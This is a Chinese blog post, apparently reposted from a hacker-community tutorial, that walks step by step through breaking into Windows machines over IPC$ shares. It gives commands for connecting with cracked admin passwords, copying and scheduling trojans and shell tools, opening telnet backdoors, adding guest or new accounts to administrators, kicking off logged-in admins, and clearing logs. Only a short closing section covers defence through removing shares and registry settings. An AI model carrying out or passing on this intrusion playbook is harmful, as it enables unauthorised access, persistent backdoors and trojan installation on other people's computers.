gbk

DOS入侵示例

DOS入侵示例
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)

1. C:">net use ""127.0.0.1"IPC$ "密码" /user:"用户名"

一般用流光,通过扫描弱口令来得到,管理员帐号和密码.

2. C:">copy srv.exe ""127.0.0.1"admin$

先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:"winnt"system32",大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。



3. C:">net time ""127.0.0.1

查查时间,发现127.0.0.1 的当前时间是 2004/6/15 上午 11:00,命令成功完成。



4. C:">at ""127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧

5. C:">net time ""127.0.0.1

再查查到时间没有?如果127.0.0.1 的当前时间是 2004/6/15 上午 11:05,那就准备开始下面的命令。



6. C:">telnet 127.0.0.1 99

这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了



7.C:">copy ntlm.exe ""127.0.0.1"admin$

用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。



8. C:"WINNT"system32>ntlm

输入ntlm启动(这里的C:"WINNT"system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组

10. C:">net user guest /active:yes

将对方的Guest用户激活

11. C:">net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12. C:">net localgroup administrators guest /add

将Guest变为Administrator(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算

13.使用nb2的sql工具。远程执行dos命令

net start telnet 开telnet服务

net user mint mint /add 添加用户mint密码为mint

net localgroup administrators mint /add 将帐号mint升级为管理员

7,使用3389登陆。发现登陆用户已满。不用怕。我们把他踢出去。

8,telnet对方ip。发现需要NTLM 身份验证。怎么办?放弃不是黑客的追求。

9,我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。

10,找到c:"winnt"system32"cmd.exe 建立一个快捷方式到桌面。

11,修改cmd的快捷方式属性为允许其他身份登陆。

12,然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint

13,telnet对方ip.直接可以登陆对方电脑了。

使用命令

c:"query user 查看对方目前终端登陆状况。

运行命令

c:"logoff 1 踢出去一个管理者

再用c:"query user检查一便~~

ok了

14,使用3389远程终端登陆。

入侵中可能会用到的相关命令

请注意命令适用于本地还是远程,如果适用于本地,你只能在获得远程主机的shell后,才能向远程主机执行。

1 建立空连接:

net use ""IP"ipc$ "" /user:""

2 建立非空连接:

net use ""IP"ipc$ "psw" /user:"account"

3 查看远程主机的共享资源(但看不到默认共享)

net view ""IP

4 查看本地主机的共享资源(可以看到本地的默认共享)

net share

5 得到远程主机的用户名列表

nbtstat -A IP

6 得到本地主机的用户列表

net user

7 查看远程主机的当前时间

net time ""IP

8 显示本地主机当前服务

net start

9 启动/关闭本地服务

net start 服务名 /y

net stop 服务名 /y

10 映射远程共享:

net use z: ""IP"baby

此命令将共享名为baby的共享资源映射到z盘

11 删除共享映射

net use c: /del 删除映射的c盘,其他盘类推

net use * /del /y删除全部

12 向远程主机复制文件

copy "路径"srv.exe ""IP"共享目录名,如:

copy ccbirds.exe ""*.*.*.*"c 即将当前目录下的文件复制到对方c盘内

13 远程添加计划任务

at ""ip 时间 程序名,如:

at ""127.0.0.0 11:00 love.exe

注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径

14 开启远程主机的telnet

这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求:

1)目标开启了ipc$共享

2)你要拥有管理员密码和帐号

3)目标开启RemoteRegistry服务,用户就该ntlm认证

4)对WIN2K/XP有效,NT未经测试

命令格式:OpenTelnet.exe ""server account psw NTLM认证方式 port

试例如下:c:">OpenTelnet.exe ""*.*.*.* administrator "" 1 90

15 激活用户/加入管理员组

1 net uesr account /active:yes

2 net localgroup administrators account /add

16 关闭远程主机的telnet

同样需要一个小程序:ResumeTelnet.exe

命令格式:ResumeTelnet.exe ""server account psw

试例如下:c:">ResumeTelnet.exe ""*.*.*.* administrator ""

17 删除一个已建立的ipc$连接

net use ""IP"ipc$ /del

(本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创http://ccbirds.yeah.net)

十二 ipc$完整入侵步骤祥解

其实入侵步骤随个人爱好有所不同,我就说一下常见的吧,呵呵,献丑了!

1 用扫描软件搜寻存在若口令的主机,比如流光,SSS,X-scan等,随你的便,然后锁定目标,如果扫到了管理员权限的口令,你可以进行下面的步骤了,假设你现在得到了administrator的密码为空

2 此时您有两条路可以选择:要么给对方开telnet(命令行),要么给它传木马(图形界面),那我们就先走telnet这条路吧

3上面开telnet的命令没忘吧,要用到opentelnet这个小程序

c:">OpenTelnet.exe ""192.168.21.* administrator "" 1 90

如果返回如下信息

*******************************************************

Remote Telnet Configure, by refdom

Email: refdom@263.net

OpenTelnet.exe

UsagepenTelnet.exe ""server username password NTLMAuthor telnetport

*******************************************************

Connecting ""192.168.21.*...Successfully!

NOTICE!!!!!!

The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23

Starting telnet service...

telnet service is started successfully! telnet service is running!

BINGLE!!!Yeah!!

Telnet Port is 90. You can try:"telnet ip 90", to connect the server!

Disconnecting server...Successfully!

*说明你已经打开了一个端口90的telnet。

4 现在我们telnet上去

telnet 192.168.21.* 90

如果成功,你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了,那么做点什么呢?把guest激活再加入管理组吧,就算留个后门了

5 C:">net user guest /active:yes

*将Guest用户激活,也有可能人家的guest本来就试活的,你可以用net user guest看一下它的帐户启用的值是yes还是no

6 C:">net user guest 1234

*将Guest的密码改为1234,或者改成你喜欢的密码

7 C:">net localgroup administrators guest /add

*将Guest变为Administrator,这样,即使以后管理员更改了他的密码,我们也可以用guest登录了,不过也要提醒您,因为通过安全 策略的设置,可以禁止guest等帐户的远程访问,呵呵,如果真是这样,那我们的后门也就白做了,愿上帝保佑Guest。

8 好了,现在我们来走另一条路,给它传个木马玩玩

9 首先,我们先建立起ipc$连接

C:">net use ""192.168.21.*"ipc$ "" /user:administrator

10 既然要上传东西,就要先知道它开了什么共享

C:">net view ""192.168.21.*

在 ""192.168.21.*的共享资源

资源共享名 类型 用途 注释

-----------------------------------------------------------

C Disk

D Disk

命令成功完成。

*好了,我们看到对方共享了C,D两个盘,我们下面就可以向任意一个盘复制文件了。再次声明,因为用net view命令无法看到默认共享,因此通过上面返回的结果,我们并不能判断对方是否开启了默认共享。

11 C:">copy love.exe ""192.168.21.*"c

已复制 1 个文件

*用这个命令你可以将木马客户端love.exe传到对方的c盘下,当然,如果能复制到系统文件夹下是最好的了,不容易被发现

12 运行木马前,我们先看看它现在的时间

net time ""192.168.21.*

""192.168.21.*的当前时间是 2003/8/22 上午 11:00

命令成功完成

13 现在我们用at运行它吧,不过对方一定要开了Task Scheduler服务(允许程序在指定时间运行),否则就不行了

C:">at ""192.168.21.* 11:02 c:"love.exe

新加了一项作业,其作业 ID = 1

14 剩下就是等了,等过了11:02,你就可以用控制端去连接了,如果成功你将可以用图形界面去控制远程主机了,如果连接失败,那么它可能在局域网里,也可能程序被防火墙杀了,还可能它下线了(没这么巧吧),无论哪种情况你只好放弃了

嗯,好了,两种基本方法都讲了。如果你对上面的操作已经轻车熟路了,也可以用更高效的套路,比如用CA克隆guest,用psexec执行木马,用命 令:psexec ""tergetIP -u user -p paswd cmd.exe直接获得shell等,这些都是可以得,随你的便。不过最后不要忘了把日志清理干净,可以用榕哥的elsave.exe。

讲了ipc$的入侵,就不能不说如何防范,那么具体要怎样做呢?看下面

1,怎样建立空连接,它有什么用?

答:使用命令 net use "IPipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。

对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。

2.为什么我连不上IPC$?

答:1.只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。

2.确认你的命令没有打错。正确的命令是: net use "目标IPipc$ "密码" /user:"用户名"

注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。

3,根据返回的错误号分析原因:

错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;

错误号51,Windows 无法找到网络路径 : 网络有问题;

错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);

错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;

错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。

错误号1326,未知的用户名或错误密码 : 原因很明显了;

错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)

错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。

4,关于ipc$连不上的问题比较复杂,没有总结出一个统一的认识,在肉鸡上实验有时会得出矛盾的结论,十分棘手。 而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。

5,怎样打开目标的IPC$?

答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是admin权限的。然 后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用 法)。还是不行的话(比如有防火墙,杀不了)建议放弃。

6,怎样映射和访问默认共享?

答:使用命令 net use z: "目标IPc$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘,其他盘类推。

如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe "IPd$pathmuma.exe 。或者再R射也可以,只是不用用户名和密码了:net use y: "IPd$ 。然后 copy muma.exe y:pathmuma.exe 。当路径中包含空格时,须用""将路径全引住。

7,如何删除映射和ipc$连接?

答:用命令 net use "IPipc$ /del 删除和一个目标的ipc$连接。

用命令 net use z: /del 删除映射的z盘,其他盘类推。

用命令 net use * /del 删除全部。会有提示要求按y确认。

8,连上ipc$然后我能做什么?

答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具(比如pstools系 列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(没开你就帮他开),你 就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是 2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。

9,怎样防止别人用ips$和默认共享入侵我?

答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。

1,先把已有的删除

net share ipc$ /del

net share admin$ /del

net share c$ /del

…………(有几个删几个)

2,禁止别人空连接

首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous(DWORD)的键值改为:00000002。

3,禁止自动打开默认共享

对于server版,找到如下主键 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters] 把AutoShareServer(DWORD)的键值改为:00000000。

对于pro版,则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的键值改为:00000000。

如果上面所说的主键不存在,就新建一个再改键值。

B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)

net stop lanmanserver

可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。

C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。

D、还有一个办法就是装防火墙,或者端口过滤。

结束进程:ntsd -c q -p PID

posted on 2007-12-23 11:20 百科 阅读(148) 评论(0)  编辑  收藏


只有注册用户登录后才能发表评论。


网站导航:
 

My Links

Blog Stats

常用链接

留言簿(2)

随笔档案

文章档案

搜索

最新评论

阅读排行榜

评论排行榜